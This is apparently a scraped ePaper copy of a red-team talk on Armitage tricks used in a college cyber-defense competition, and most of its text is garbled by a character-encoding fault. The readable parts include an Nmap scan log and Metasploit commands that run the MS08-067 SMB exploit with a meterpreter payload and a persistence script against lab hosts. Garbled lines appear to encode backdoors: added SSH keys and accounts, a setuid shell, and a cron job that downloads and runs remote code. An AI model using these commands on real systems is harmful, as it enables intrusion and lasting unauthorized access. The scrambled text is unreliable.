Dirty Red Team Tricks - Armitage
Dirty Red Team Tricks - Armitage
Dirty Red Team Tricks - Armitage
- No tags were found...
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
!"#$%&'()&*(+,&*#"-./&!"#$"%&'()*+%',"-./0"+%$"12%-'
!"#$"%#&'! !"##$%&'($)!*+$,)-$.$/0$)!"12$(&(&"/)! 34*)561)%&7&/%)(4&0)('#8)9:&%,$00&"/;,)?,"@$00)! A4$)3',)".)?$,0&0($/@$)! A$'1B",8)
()*'+$#',*-.'! !!-!)?',(&@&2'/()C)A$'1)D$/(",)" E$',/)4"B),$:)($'1)(4&/80)! F$:)A$'1)D$1+$,)" ?&@8)>2)').$B)(,&@80)! G7$,*"/$)G#0$)" A$##)')0(",*H)34$,$):")+'+&$0)@"1$).,"1I)
0/'1&&&23+4%*3+566762*$89'! -$.$/0$)@"12$(&(&"/).",)@"##$%$)0(>:$/(0)! JKL)>0$,0M)NOPK)0$,7$,0M)B$+M)1'&#M)$(@Q)! 5:$/(&@'#)4',:B',$)'/:)0".(B',$)'@,"00)($'10)! R@",$:)"/))" 0$,7&@$)'7'&#'+&#&(*)" ,$02"/0$)(")&/S$@($:)$7$/(0)" '/:)'+&#&(*)(")0("2)(4$),$:)($'1;Q))))
(),':;
(),':;,/&/%)($'10),$':*).",)2'0()(,&@80)$'@4)*$',)" U$B@"1$,0)%$()$'($/)>2)+*)"#:)(,&@80)#)
(),':;$0(&"/0)" ]"B)1'/*)KO:'*0):&:)*">)>0$I)" ^">)4':)')4$':)0(',(M)/").'&,_)" ]"B):&:)*">)%$()&/I)
(),':;("1'($:)`U5a)?B/'%$)VKPK)T)" Y,1&('%$).",)D$('02#"&()VKPP)T)
(),':;,@$0)
01#&2#3-(//&
@#6*33+%==+36#'
@#6*33+%==+36#'
@#6*33+%==+36#'
A3-0)R@'/)
B66#=='! A":'*60)(""#0)
B66#=='! A":'*60)(""#0)70Q)R(>:$/()U$(B",80)
C%7#*D'E*=4'AFG5*%4+4%*3'$'
4+#&35&2(#/"/$(6-(&
HI:J'!&3#$=)%G?'
B77'+3'KKL'M#,''18:&,)C,""(CQ004)@'()ggC,""(CQ004C'>(4",&e$:h8$*0)i&/0$,()1*)($'1)RR])8$*j)
$NN4'=)#55O?'@2)C+&/Ce04)CQ8$,/$#)@41":)L000)CQ8$,/$#)(">@4)O:)kl)D'*)VKKlk)CQ8$,/$#)@4'((,)L&)CQ8$,/$#)
B77'+'3#&'-=#$?'$@4")k/"+":*WHQQHPlVXPHKHXXXXXHNHHHk)ggC$(@C04':"B)$@4")k/"+":*WHZHKHKH/"+":*MMMMHCHC+&/C+'04k)ggC$(@C2'00B:)
P+6>7**$'I#&'H=#$='$'i>2#"':),$7$,0$)04$##)@'##+'@8)(")C>0,C+&/C>.Bj)$@4")kC>0,C+&/C>.B)mk)ggC$(@C2,"n#$)$@4")kC>0,C+&/C>.B)mk)ggC$(@C08$#CQ2,"n#$)@41":)L000)C>0,C+&/C>.B)@4'((,)L&)C$(@C08$#CQ2,"n#$)C$(@C2,"n#$)C>0,C+&/C>.B)
Q)#44*'/+55R+6>'o_C+&/C+'04)$Z2",()`?-YAGh`FEp4((2HCCPXVQPqWQVKrQNJC4$##"B",#:Q(Z()&.)i)sB4&@4)#*/Zs)j)(4$/)))))))))#*/Z)O0">,@$)t`?-YAGh`FE)PgC(12CQ&//O#'($0()VgC:$7C/>##)$#0$)))))))))&.)i)sB4&@4)@>,#s)j)))))))))(4$/)))))))))))))))))@>,#)t`?-YAGh`FE)PgC(12CQ&//O#'($0()VgC:$7C/>##)))))))))$#0$)))))))))))))))))&.)i)sB4&@4)B%$(s)j)))))))))))))))))(4$/)))))))))))))))))))))))))B%$()t`?-YAGh`FE)O=)C(12CQ&//O#'($0()VgC:$7C/>##)))))))))))))))))n)))))))))n)n)@41":)LZ)C(12CQ&//O#'($0()C(12CQ&//O#'($0(),1)O.)C(12CQ&//O#'($0()
:3=4+55'/+55R+6>'i>2#"':)C$(@C@,"/Q4">,#*C&//O@,"/O,/$B0j)(">@4)O:)kPV)c>#)KWk)C$(@C@,"/Q4">,#*C&//O@,"/O,/$B0)@4'((,)L&)C$(@C@,"/Q:'&#*C&//O@,"/O,/$B0)
K4*$,'S%
ST;='(%37*&='!&3#$=)%G?'
)*=4=24F4'Host: 192.168.95.255 () !Status: Down!Host: 192.168.95.1 () !Status: Up!Host: 192.168.95.1 ()microsoft-ds///!!Ports: 445/closed/tcp//Host: 192.168.95.132 () !Status: Up!Host: 192.168.95.132 ()microsoft-ds///!!Ports: 445/closed/tcp//Host: 192.168.95.155 () !Status: Up!Host: 192.168.95.155 ()microsoft-ds///!!Ports: 445/closed/tcp//Host: 192.168.95.156 () !Status: Up!Host: 192.168.95.156 ()microsoft-ds///!!Ports: 445/open/tcp//Host: 192.168.95.174 () !Status: Up!Host: 192.168.95.174 () !Ports: 445/open/tcp//microsoft-ds///!# Nmap done at Fri Mar 11 02:04:05 2011 -- 256 IPaddresses (5 hosts up) scanned in 2.20 seconds!
U-32$6'setg AutoRunScript persistence -p192.168.95.155 -r 16819 -i 30 -S -U!use exploit/windows/smb/ms08_067_netapi!setg PAYLOAD windows/meterpreter/bind_tcp!set RHOST 192.168.95.156!exploit -j!set RHOST 192.168.95.174!exploit -j!
C%7#*D'VB//0/'!G#3%38'K+5"*'
B37',#4?'
*(+,"67&
*55+R*$+4%*3'I##7='! F$'#O(&1$)!"11>/&@'(&"/)! -'(')R4',&/%)! R$00&"/)R4',&/%)
B$
K#==%*3'K)+$%38'K*5-4%*3'
S#+
:7#+5'S#+
P#,*37'//0/'4((2HCCBBBQ#"@'#/$B0WQ@"1C7&:$"CVXrJqJKJC&/:$ZQ4(1#)
K-
Q$##4W'A"::)EQ)c"/)!#'>:&>0)E'>,')b>'*)cd"00)-',*#)c"4/0"/)F*'/)F$*/"#:0)b$,,*)d,>/$##$)R&#'0)!>(#$,)c'+,')3&##)!',#)uA4$)R4',8v)b$",%&')3&$:1'/)R'1)wQ)-'7$)3�"/)D'(()b,'$+$,)c$00$)x',0'#"/$)c$y)R@'22',')AQcQ)=6!"//",)-,Q)F'&:)F*'/)R1&(4)A"1)x'@4"/)A"1)A>.(0)z'@8)['0$#)F"+)uD>+&Zv)[>##$,)
()#$#'4*'8*'U$*